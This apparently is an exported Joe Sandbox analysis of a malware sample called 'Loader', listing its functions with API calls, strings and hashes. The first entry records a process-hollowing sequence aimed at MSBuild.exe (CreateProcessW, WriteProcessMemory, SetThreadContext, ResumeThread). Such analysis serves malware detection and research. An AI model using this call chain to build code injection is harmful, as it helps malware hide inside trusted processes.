ResumeThread, xrefs: 00CF02D8
GetP, xrefs: 00CF021E

Memory Dump Source

Source File: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 8a7c6285216a724a6d70ce2ad864feaf862a09251a96c88b98aa60e6954cc71b
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: FCB10B7664064AAFDB60CF58CC80BEA73A5FF88714F158114EA1CAB342D774FA51CB94

Function 00CC1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00CC1C3B
CreateFileA.KERNELBASE ref: 00CC1C94
GetFileSize.KERNEL32 ref: 00CC1CC3
CloseHandle.KERNEL32 ref: 00CC1CDF

Strings

CreateFileA, xrefs: 00CC1C2E

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
Instruction ID: 07df4c49a6e64b5a2eed55e6ba22de401b5ac359ba41a96432ac09578365c069
Opcode Fuzzy Hash: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
Instruction Fuzzy Hash: 7941A4B0D082499FDB00EFA9D4987AEBBF0EF49314F04852DE899AB391D7749544CF92

Function 00CD6642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,F876D5F9,?,00CD6751,00000000,00000000,00000000,00000000), ref: 00CD6703

Strings

api-ms-, xrefs: 00CD6699
ext-ms-, xrefs: 00CD66AD

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
Instruction ID: b37d2abffe13f457b8cd396503f340c7f74600be9d9c66a2057b3f55231d799e
Opcode Fuzzy Hash: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
Instruction Fuzzy Hash: 8E210D36A01214A7C7319B66DC45B5E37B8DB417B4F150122FF15A7391EB30EE01D6E0

Function 00CC20C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00CC20E6
GetProcAddress.KERNEL32 ref: 00CC20FE
FreeConsole.KERNELBASE ref: 00CC210D

Strings

FreeConsole, xrefs: 00CC20F1
kernel32.dll, xrefs: 00CC20DD

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: AddressConsoleFreeHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1635486814-2564406000
Opcode ID: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
Instruction ID: 31b758787dead4bbb77bf84c1d3ab0062769d49b75bff57ce21389132b9ea46d
Opcode Fuzzy Hash: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
Instruction Fuzzy Hash: 990166749042489FCB40EFB8D98579DBBF4AB48300F41856AE849DB351EB34A654DF82

Function 00CC1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00CC1E6E
VirtualProtect.KERNELBASE ref: 00CC1EC3

Strings

VirtualProtect, xrefs: 00CC1E61
@, xrefs: 00CC1EB7

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
Instruction ID: ac1913e113e58ebd1cd30228865e810d141904fd9748f2118573445a7401eebe
Opcode Fuzzy Hash: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
Instruction Fuzzy Hash: 7341D0B0900208DFCB04DFA9D998B9EBBF0FF08344F118459E858AB341D775A944CF82

Function 00CCF293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00CCF1A0,?,00CCF355,00000000,?,?,00CCF1A0,F876D5F9,?,00CCF1A0), ref: 00CCF2A4
TerminateProcess.KERNEL32(00000000,?,00CCF355,00000000,?,?,00CCF1A0,F876D5F9,?,00CCF1A0), ref: 00CCF2AB
ExitProcess.KERNEL32 ref: 00CCF2BD

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fba4a784ae1d16194e1a5d6cf027f92175b3f48819d70f6e1a1fcd1d7a8658dd
Instruction ID: 85838204c3139ad87c97597d80d8380cf211a6d7641b504596429e5895dfcd1b
Opcode Fuzzy Hash: fba4a784ae1d16194e1a5d6cf027f92175b3f48819d70f6e1a1fcd1d7a8658dd
Instruction Fuzzy Hash: 06D06C32000188ABDF152FA4EC49B9D3F6AAB44391B944029F9199A072CF359996EA90

Function 00CDD3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CDD74E: GetConsoleOutputCP.KERNEL32(F876D5F9,00000000,00000000,?), ref: 00CDD7B1

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00CCD832,?,00CCDA94), ref: 00CDD529
GetLastError.KERNEL32(?,00CCD832,?,00CCDA94,?,00CCDA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00CDD533

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: ecbc99522cd464705de079367e6132e7f4d795ef561eba2ac08887c3907d4f35
Instruction ID: c188e66382a534025fb6c7d7da297e90094fbdd030970fc716f583ddbefedba2
Opcode Fuzzy Hash: ecbc99522cd464705de079367e6132e7f4d795ef561eba2ac08887c3907d4f35
Instruction Fuzzy Hash: B961B4B1D00119AFDF11DFA8D884AFEBFB9AF49308F140146EA16A7356D371DA01DBA1

Function 00CD72A8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CD74AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00CD74D8

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00CD76B8,?,00000000,?,?,?), ref: 00CD7309
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CD76B8,?,00000000,?,?,?), ref: 00CD7345

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 6041a77f1d2ae73757b799583911339cfcb6d809f336c70796cf7c2c53d1021d
Instruction ID: 91544028a971bcab673e3f1e63b3f2cef4a0e99bf80cb9fbf0919626cbdf7492
Opcode Fuzzy Hash: 6041a77f1d2ae73757b799583911339cfcb6d809f336c70796cf7c2c53d1021d
Instruction Fuzzy Hash: 04512470A082459EDB21CF35C8856AAFBF5EF44300F18466FD6A68B361F7749A46DF80

Function 00CDDB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00CDD50F,?,00CCDA94,?,?,?,00000000), ref: 00CDDC19
GetLastError.KERNEL32(?,00CDD50F,?,00CCDA94,?,?,?,00000000,?,?,?,?,?,00CCD832,?,00CCDA94), ref: 00CDDC3F

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 7048dcaabd859191b0dbcc429820b3cbfa300d70d48d05eba659ec64f4544220
Instruction ID: 46544e3d85929fd388dca613b49dab580c555270846b578e01178165548fb128
Opcode Fuzzy Hash: 7048dcaabd859191b0dbcc429820b3cbfa300d70d48d05eba659ec64f4544220
Instruction Fuzzy Hash: 17216031A002199FCB19CF29DC90AEDB7B9EB98305F1441AAEA06D7351D730EE46CF65

Function 00CD7192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00CD7081,00CEFCD8,0000000C), ref: 00CD71DE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00CD7081,00CEFCD8,0000000C), ref: 00CD71F0

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: b2812173536ac2adb018892da5c777136ba60b40e8b4ad5ab80848fe5aa5ecea
Instruction ID: 0c8e3be1b6c82313c762e5902a13cf05d578c2d416b3321a86be5316e96a4e24
Opcode Fuzzy Hash: b2812173536ac2adb018892da5c777136ba60b40e8b4ad5ab80848fe5aa5ecea
Instruction Fuzzy Hash: 8011DA3110C7818ACB348E3E8C8873A7A95A756370B38075FE6BA877F1E730DA46D641

Function 00CC2010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00CC2038
GetModuleFileNameW.KERNEL32 ref: 00CC2058

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: df661b2f68ccf578d63f565faa9b22fa2e95a3a22138f55475c57c905a81d8e1
Instruction ID: 03a94ebb9a9dfb1fc635de11f5407040ef947bed566f100fed9bcc794324bcdf
Opcode Fuzzy Hash: df661b2f68ccf578d63f565faa9b22fa2e95a3a22138f55475c57c905a81d8e1
Instruction Fuzzy Hash: 4701ECB09042088FDB15EF68D58579DBBF4FB48340F4145ADE889D7381EB749A88DF52

Function 00CD64F3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00CD6F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00CD6527
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00CD6F1A,?,?,-00000008,?,00000000), ref: 00CD6545

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 991e8124ab774c7b9bc5743ddee40963353761c348e3264a072bab5ba6ff9404
Instruction ID: 868df29e9cd5b52c60f9dd09a85a29f5902441891fdbc4600933a0a3116f9782
Opcode Fuzzy Hash: 991e8124ab774c7b9bc5743ddee40963353761c348e3264a072bab5ba6ff9404
Instruction Fuzzy Hash: 28F07A3240015ABBCF126F91EC15EDE7F66FF487A0F058511FA1825224C732CA71EB91

Function 00CD56B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00CD9A64,?,00000000,?,?,00CD9704,?,00000007,?,?,00CDA04A,?,?), ref: 00CD56CD
GetLastError.KERNEL32(?,?,00CD9A64,?,00000000,?,?,00CD9704,?,00000007,?,?,00CDA04A,?,?), ref: 00CD56D8

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9eb3c190f95d917194db2b3cb48d05d42cf801478e05904f7147920309df0a00
Instruction ID: 5f44e523f0033ba4e17593d542670b804d91b61185be0ffbd08ad8523624962e
Opcode Fuzzy Hash: 9eb3c190f95d917194db2b3cb48d05d42cf801478e05904f7147920309df0a00
Instruction Fuzzy Hash: DEE08C32200654BBDB212FA8EC08B9D7A989B00792F184022FB1C8A2B0CB30C990DB94

Function 00CD7837 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,00CD76B8,?), ref: 00CD7869

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 80723a258b4f0f8a79024c4ccc1f569972284a1eb482d4457549d9b27fac8d4c
Instruction ID: aa679ace7cb9d7feecdc9ff6d8a14410c0e6bb63efa0a42d4ed595eb7a0621d0
Opcode Fuzzy Hash: 80723a258b4f0f8a79024c4ccc1f569972284a1eb482d4457549d9b27fac8d4c
Instruction Fuzzy Hash: C2517DB190C1589EDB118A29CDC4BF97B6DFF15300F1402EAE299D7282E3309E45DFA0

Function 00CD670D Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966c15dfaba98b343a770cdd30e5bf71cb65915b6d039df03c6a185d297628b8
Instruction ID: 0ed63f317c1ce5b1d7282242afc7799593bac56f6bc8c6371447ebd20ac60daa
Opcode Fuzzy Hash: 966c15dfaba98b343a770cdd30e5bf71cb65915b6d039df03c6a185d297628b8
Instruction Fuzzy Hash: 0001DD336001199F9B159F69EC81B2A73A5F7C1B647364126FA10C7295DB31EC10D7D1

Function 00CD56F1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00CD7675,?,?,00CD7675,00000220,?,?,?), ref: 00CD5723

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: df208ad1a9e06ac953777d7a6130a729f5687d97a73c3ca822d0c72f624548fe
Instruction ID: 05526bac416a5e26e9e3ff4ce9b3bc61fc0140098cf63e7e4199828b13249f81
Opcode Fuzzy Hash: df208ad1a9e06ac953777d7a6130a729f5687d97a73c3ca822d0c72f624548fe
Instruction Fuzzy Hash: 1CE06D31620A21E6EA216AA69C06F5F3698DF417F0F3A0123EE259A390EF60CD4191E1

Non-executed Functions

Function 00CDB1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB250
GetLocaleInfoW.KERNEL32(?,20001004,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB279
GetACP.KERNEL32(?,?,00CDAB6D,?,00000000), ref: 00CDB28E

Strings

OCP, xrefs: 00CDB20B
ACP, xrefs: 00CDB1D5

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
